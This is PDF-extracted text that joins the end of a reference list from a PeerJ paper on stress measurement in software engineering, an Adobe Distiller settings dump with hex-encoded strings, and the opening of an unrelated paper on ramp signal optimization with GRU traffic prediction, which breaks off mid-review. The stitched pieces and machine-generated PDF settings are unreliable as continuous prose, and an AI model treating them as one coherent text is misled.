anxiety inventory score under mental arithmetic stress: a pilot study. Anesthesia & Analgesia 101(6):1873–1876 DOI 10.1213/01.ANE.0000184196.60838.8D. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 36/38 http://dx.doi.org/10.1002/(SICI)1520-6793(200002)17:2%3C79::AID-MAR2%3E3.0.CO;2-0 http://dx.doi.org/10.1016/0306-4530(94)90013-2 http://dx.doi.org/10.1038/s41598-017-17485-w http://dx.doi.org/10.1207/s15327965pli0101_1 http://dx.doi.org/10.1016/j.jss.2015.04.084 http://dx.doi.org/10.1016/j.jneumeth.2013.10.024 http://dx.doi.org/10.1016/j.ijpsycho.2004.09.009 http://dx.doi.org/10.1016/j.autrev.2014.01.025 http://dx.doi.org/10.1007/s00702-018-01965-y http://dx.doi.org/10.1213/01.ANE.0000184196.60838.8D http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Ostberg J-P, Graziotin D, Wagner S, Derntl B. 2017. Towards the assessment of stress and emotional responses of a salutogenesis-enhanced software tool using psychophysiological measurements. In: Proceedings of the 2nd International Workshop on Emotion Awareness in Software Engineering. IEEE Press, 22–25. Ostberg J-P, Wagner S. 2016. At ease with your warnings: the principles of the salutogenesis model applied to automatic static analysis. In: 2016 IEEE 23rd International Conference on Software Analysis, Evolution, and Reengineering (SANER). Vol. 1. 629–633. Paulhus DL. 1991. Measurement and control of response bias. In: Robinson JP, Shaver PR, Wrightsman LS, eds. Measures of Social Psychological Attitudes: Measures of Personality and Social Psychological Attitudes. Vol. 1. Cambridge: Academic Press. Peacock EJ, Wong PT. 1990. The stress appraisal measure (sam): a multidimensional approach to cognitive appraisal. Stress and Health 6(3):227–236. Pittenger DJ. 1993. The utility of the Myers-Briggs type indicator. Review of Educational Research 63(4):467–488 DOI 10.3102/00346543063004467. Plarre K, Raij A, Hossain SM, Ali AA, Nakajima M, Al’Absi M, Ertin E, Kamarck T, Kumar S, Scott M, Siewiorek D, Smailagic A, Wittmers LE. 2011. Continuous inference of psychological stress from sensory measurements collected in the natural environment. In: 10th International Conference on Information Processing in Sensor Networks (IPSN). IEEE, 97–108. Pressman SD, Cohen S. 2005. Does positive affect influence health? Psychological Bulletin 131(6):925–971 DOI 10.1037/0033-2909.131.6.925. Rahe RH. 1977. Stressful life events-their nature and effects. Psychosomatic Medicine 39(1):64–65 DOI 10.1097/00006842-197701000-00011. Rajeswari K, Anantharaman R. 2003. Development of an instrument to measure stress among software professionals: Factor analytic study. In: Proceedings of the 2003 SIGMIS Conference on Computer Personnel Research. ACM, 34–43. Reinhardt T, Schmahl C, Wüst S, Bohus M. 2012. Salivary cortisol, heart rate, electrodermal activity and subjective stress responses to the Mannheim Multicomponent Stress Test (MMST). Psychiatry Research 198(1):106–111 DOI 10.1016/j.psychres.2011.12.009. Richter P, Hacker W. 1998. Belastung und Beanspruchung: stress, Ermüdung und Burnout im Arbeitsleben. Heidelberg: Asanger Roland Verlag. Rommel E, Pimlott J. 2014. Rommel: in his own words. London: Amber Books Ltd. Schneider F, Gur RC, Gur RE, Muenz LR. 1994. Standardized mood induction with happy and sad facial expressions. Psychiatry Research 51(1):19–31 DOI 10.1016/0165-1781(94)90044-2. Schneider F, Weiss U, Kessler C, Müller-Gärtner H-W, Posse S, Salloum JB, Grodd W, Himmelmann F, Gaebel W, Birbaumer N. 1999. Subcortical correlates of differential classical conditioning of aversive emotional reactions in social phobia. Biological Psychiatry 45(7):863–871. Schwarz N. 1999. Self-reports: how the questions shape the answers. American Psychologist 54(2):93–105 DOI 10.1037/0003-066X.54.2.93. Selye H. 1946. The general adaptation syndrome and the diseases of adaptation 1. Journal of Clinical Endocrinology & Metabolism 6(2):117–230 DOI 10.1210/jcem-6-2-117. Selye H. 1976. The stress of life (revised edition). New York: McGraw-Hill. Shaw D. 2016. Facebook’s flawed emotion experiment: Antisocial research on social network users. Research Ethics 12(1):29–34 DOI 10.1177/1747016115579535. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 37/38 http://dx.doi.org/10.3102/00346543063004467 http://dx.doi.org/10.1037/0033-2909.131.6.925 http://dx.doi.org/10.1097/00006842-197701000-00011 http://dx.doi.org/10.1016/j.psychres.2011.12.009 http://dx.doi.org/10.1016/0165-1781(94)90044-2 http://dx.doi.org/10.1037/0003-066X.54.2.93 http://dx.doi.org/10.1210/jcem-6-2-117 http://dx.doi.org/10.1177/1747016115579535 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Sonnentag S, Brodbeck FC, Heinbokel T, Stolte W. 1994. Stressor-burnout relationship in software development teams. Journal of Occupational and Organizational Psychology 67(4):327–341 DOI 10.1111/j.2044-8325.1994.tb00571.x. Strahler J, Skoluda N, Kappert MB, Nater UM. 2017. Simultaneous measurement of salivary cortisol and alpha-amylase: application and recommendations. Neuroscience & Biobehavioral Reviews 83:657–677 DOI 10.1016/j.neubiorev.2017.08.015. Suni Lopez F, Condori-Fernández N, Catala Bolos A. 2018. Towards real-time automatic stress detection for office workplaces. In: Proceedings of the 5th International Conference, SIMBig 2018, September 3–5, 2018, Lima, Peru. Thompson CW, Roe J, Aspinall P, Mitchell R, Clow A, Miller D. 2012. More green space is linked to less stress in deprived communities: Evidence from salivary cortisol patterns. Landscape and Urban Planning 105(3):221–229 DOI 10.1016/j.landurbplan.2011.12.015. Van Eck M, Berkhof H, Nicolson N, Sulon J. 1996. The effects of perceived stress, traits, mood states, and stressful daily events on salivary cortisol. Psychosomatic Medicine 58(5):447–458 DOI 10.1097/00006842-199609000-00007. Vrijkotte TG, Van Doornen LJ, De Geus EJ. 2000. Effects of work stress on ambulatory blood pressure, heart rate, and heart rate variability. Hypertension 35(4):880–886 DOI 10.1161/01.HYP.35.4.880. Wagner S, Mendez D, Felderer M, Graziotin D, Kalinowski M. 2020. Challenges in survey research. In: Felderer M, Travassos GH, eds. Contemporary Empirical Methods in Software Engineering. Cham: Springer International Publishing, 1–514. Watson D, Clark LA, Tellegen A. 1988. Development and validation of brief measures of positive and negative affect: the PANAS scales. Journal of Personality and Social Psychology 54(6):1063–1070 DOI 10.1037/0022-3514.54.6.1063. Weinert AB. 2004. Organisations-und personalpsychologie. Weinheim: Verlagsgruppe Beltz. Weiss U, Salloum JB, Schneider F. 1999. Correspondence of emotional self-rating with facial expression. Psychiatry Research 86(2):175–184 DOI 10.1016/S0165-1781(99)00026-8. World Health Organization and Others. 1969. Health factors involved in working under conditions of heat stress: report of a WHO scientific group. Geneva: World Health Organization. Available at https://apps.who.int/iris/bitstream/handle/10665/40716/WHO_TRS_412.pdf. World Health Organization. 2005. Mental health: facing the challenges, building solutions: report from the WHO European Ministerial Conference. Copenhagen: WHO Regional Office Europe. Available at https://www.euro.who.int/__data/assets/pdf_file/0008/96452/E87301.pdf. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 38/38 http://dx.doi.org/10.1111/j.2044-8325.1994.tb00571.x http://dx.doi.org/10.1016/j.neubiorev.2017.08.015 http://dx.doi.org/10.1016/j.landurbplan.2011.12.015 http://dx.doi.org/10.1097/00006842-199609000-00007 http://dx.doi.org/10.1161/01.HYP.35.4.880 http://dx.doi.org/10.1037/0022-3514.54.6.1063 http://dx.doi.org/10.1016/S0165-1781(99)00026-8 https://apps.who.int/iris/bitstream/handle/10665/40716/WHO_TRS_412.pdf https://www.euro.who.int/__data/assets/pdf_file/0008/96452/E87301.pdf https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.286 A methodology for psycho-biological assessment of stress in software engineering Introduction Related work Background Stress measurement techniques Proposed method for stress measurement Two studies implementing the proposed method Lessons learned Conclusion Appendix flink10 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_nfiznlqmc5dubdw66g2y4lqila ---- Coordinated ramp signal optimization framework based on time series flux-correlation analysis Coordinated ramp signal optimization framework based on time series flux-correlation analysis Zhi Liu, Wendi Shu, Guojiang Shen and Xiangjie Kong College of Computer Science and Technology, Zhejiang University of Technology, Hangzhou, Zhejiang, China ABSTRACT Urban expressways provide an effective solution to traffic congestion, and ramp signal optimization can ensure the efficiency of expressway traffic. The existing methods are mainly based on the static spatial distance between mainline and ramp to achieve multi-ramp coordinated signal optimization, which lacks the consideration of the dynamic traffic flow and lead to the long time-lag, thus affecting the efficiency. This article develops a coordinated ramp signal optimization framework based on mainline traffic states. The main contribution was traffic flow-series flux-correlation analysis based on cross-correlation, and development of a novel multifactorial matric that combines flow-correlation to assign the excess demand for mainline traffic. Besides, we used the GRU neural network for traffic flow prediction to ensure real-time optimization. To obtain a more accurate correlation between ramps and congested sections, we used gray correlation analysis to determine the percentage of each factor. We used the Simulation of Urban Mobility simulation platform to evaluate the performance of the proposed method under different traffic demand conditions, and the experimental results show that the proposed method can reduce the density of mainline bottlenecks and improve the efficiency of mainline traffic. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning, Mobile and Ubiquitous Computing Keywords Ramp signal optimization, Correlation analysis, GRU neural network INTRODUCTION Traffic congestion on urban roads is an important issue that needs to be addressed in smart cities’ development. Furthermore, in addition to road congestion in the city center, urban expressways, as the hub connecting work areas and living areas, have a high load concentration during commuting, causing extensive congestion and spread quickly. The most direct and convenient way to address high traffic congestion is ramp signal duration adjustment (Papageorgiou & Kotsialos, 2002). While the expressway suffers heavy congestion during the morning and evening rush hours, the adjacent ramps are under tremendous traffic pressure. The local ramp signal optimization only considers the traffic status of one section of the ramp convergence area of the central expressway, which may aggravate the overall traffic congestion and may reduce the effective utilization of upstream-downstream traffic facilities (Zhang & Wang, 2013). When there are multiple How to cite this article Liu Z, Shu W, Shen G, Kong X. 2021. Coordinated ramp signal optimization framework based on time series flux-correlation analysis. PeerJ Comput. Sci. 7:e446 DOI 10.7717/peerj-cs.446 Submitted 5 November 2020 Accepted 25 February 2021 Published 25 March 2021 Corresponding author Xiangjie Kong, xjkong@ieee.org Academic editor Zhiwei Gao Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.446 Copyright 2021 Liu et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.446 mailto:xjkong@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.446 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ bottlenecks on the mainline or the limited capacity on the ramp, coordinated ramp signal optimization that aims at stabilizing the smooth flow on the mainline and prevent queue spillback on multiple ramps may be more effective than local optimization. In recent years, as the sensor is all over a wider range, and the accuracy is improved, real-time monitoring of urban traffic is achievable—the analysis of big data and the processing of data-driven methods to optimize the traffic signal become novel solutions (Feng et al., 2019). Existing methods use only local information, such as spatial distance, OD information (Chen et al., 2019b). They determine the traffic flow priority without consideration of the similarity of traffic patterns between the congested section and the on-ramp. Traffic flow is time-varying, and similar traffic flow patterns imply that the on-ramp has higher importance for congestion at that moment, and the lack of this consideration leads to a decrease in control efficiency. Besides, the traditional approach lacks consideration of traffic flow evolution trends and future traffic patterns, which can lead to a long time-lag. In this article, we propose a coordinated ramp signal optimization framework based on time series flux-correlation analysis. Initially, we collected the historical traffic data of the road from the PeMS database. Then, we used neural networks to make online predictions about traffic flow every 3 h and measured the predicted flow-series correlation between the congested section and ramps. Furthermore, based on the gray correlation analysis, we compared the similarity of the three traffic factors’ curves, including the correlations, spatial distance and traffic volume, with the curves of speed and obtain the corresponding contribution weights of each attribute. Finally, we used a heuristic strategy to optimize multiple-ramps signals with competing priorities coordinately. We compared the performance of the proposed method and the traditional method under different traffic demands. Our contributions are summarized as follows: � Traffic flow prediction. The traffic data of the congested road and ramps are predicted by GRU neural network in the time dimension to obtain the traffic flow at the future time to ensure real-time and prospective optimization. � Flux-correlation measurement. The correlation of the traffic flow-series between the congested section and the upstream ramps is obtained by the cross-correlation method. � Novel metrics for flow priority. Together with distance and predicted on-ramp flow, the correlations establish the weight matrix, allocating the excess traffic demand. � Heuristic ramp signal optimization. The bottleneck algorithm is used to implement our signal optimization framework based on the weight matrix. The remainder of the article organized as follows: “Literature Review” describes the traffic flow prediction method and the time-series correlation measurement; “Framework Design” demonstrates how the coordinated ramp signal optimization framework developed; “Experiment” evaluates the performance of the method based on the Simulation of Urban Mobility (SUMO) simulation platform and “Results” summarizes the full text. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 2/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ LITERATURE REVIEW Traffic flow prediction Using large-scale historical traffic data for traffic flow prediction and solving traffic management, guidance and route planning problems have become a hot research topic today (Uras et al., 2020). In essence, traffic flow forecasting is the extraction of experience and knowledge from relevant historical data to estimate the future state. Previous studies can usually be divided into parametric and nonparametric methods (Zhang et al., 2018). Parametric methods provide simple estimates of future traffic conditions with low computational complexity. However, they are only applicable to specific traffic data conditions because changes in external conditions and the randomness and nonlinearity of traffic flow can impact prediction accuracy (Kong et al., 2020, 2021). Time series analysis models use curve fitting and parameter estimation to predict future traffic flow information. The most typical method is the autoregressive integrated moving average (ARIMA). The ARIMA model adds an integral link to the autoregressive and sliding average models to eliminate short-term fluctuations in the time series. Many variants have been derived based on ARIMA, such as SARIMA (Williams & Hoel, 2003), which adds a periodic term to this base. This method is suitable for smoother traffic flows and is not sufficient for predicting complex traffic conditions. Nonparametric models have unique advantages. However, these traditional machine learning methods require labeling data in model training. Furthermore, these methods capture traffic flow characteristics using artificial features, making it difficult to achieve desirable prediction results. Kumar, Parida & Katiyar (2013) used traffic volume, speed, density and time as input variables and used the artificial neural network for short time traffic flow prediction. Many deep learning models have been proposed to solve the traffic flow prediction problem with the more expansive urban road sensing device arrangement and improved recognition accuracy. Stacked Autoencoder (SAE) (Lv et al., 2014) uses a hierarchical greedy algorithm to obtain spatio-temporal traffic flow characteristics. Recurrent neural networks have been widely used for short-time traffic flow prediction because of their ability to process arbitrary length inputs using memory units. LSTM and GRU (Cho et al., 2014) derived from RNN have shown better prediction performance. Zheng et al. (2020) proposed a convolutional LSTM neural network based on attention mechanism to extract the Spatio-temporal features of traffic flow. They also use Bi-LSTM module to extract the daily and weekly long-term features of traffic flow. Liu, Wang & Zhu (2018) used a gated CNN instead of LSTM to extract the temporal features of traffic flow and combined with CNN’s spatial features to predict the traffic flow. Besides, Traffic flow prediction with graph convolutional neural networks is becoming a trend (Shen, Zhao & Kong, 2021). Han proposed Dirgraph Convolutional Neural Network to tackle the congestion recognition problem through a new graph feature extraction method (Han et al., 2020). In this article, we use the GRU neural network for traffic flow prediction. Firstly, we mainly forecast the downstream section’s traffic volume, so the traffic sequence’s temporal Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 3/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ characteristic should be mainly concerned. Secondly, the traffic flow of the freeway is relatively stable. The variation of traffic flow in each section of the freeway mainly depends on the traffic flow entering and leaving the ramp, so we do not consider the traffic flow’s spatial characteristics. Finally, compared with other neural network methods, the design of GRU is more straightforward and meets our requirements for operability. Time-series correlation The correlation measurement between the vectors generally achieves through the distance matrix, including Euclidean distance (Berkhin, 2006) and Manhattan distance (Bakar et al., 2006). Conventional methods are generally used for two time-series data of the same length and different time lags. However, since there is necessarily a time lag between the traffic flow time series, there is no point-to-point correspondence between the two on the time axis. Researchers have come up with several ways to overcomes this shortcoming, such as dynamic time warping (Berndt & Clifford, 1994) and cross-correlation (Liao, 2005). In this article, cross-correlation is selected for correlation measurement. It has been applied to anomaly detection of key performance indicators (Li et al., 2018) and the classification of traffic smart card data (He, Agard & Trépanier, 2020). Meanwhile, it is also widely used in the field of time series clustering (Paparrizos & Gravano, 2015). Su et al. (2019) first proposes the concept of flux-correlation. This research proposed an unsupervised method to determine the correlation of server KPI fluctuations as well as the direction of fluctuations. If the fluctuations of one series are correlated with the fluctuations of another series over a period of time, then define two series are flux-correlated. We compare the flux-correlation between ramps and bottleneck sections in this article to explore the correlation between flow fluctuations. Multi-ramp coordination signal optimization In addition to ramp signal optimization, other methods include the mainline variable speed limit. However, because there are few mainline variable speed limit applications, the actual deployment is difficult and the safety risks are high. Therefore, MPC control strategy is mostly used at present, which is a typical nonlinear optimal control method that can predict the control effect to achieve control optimality, most commonly by combining the mainline variable speed limit method and the ramp control 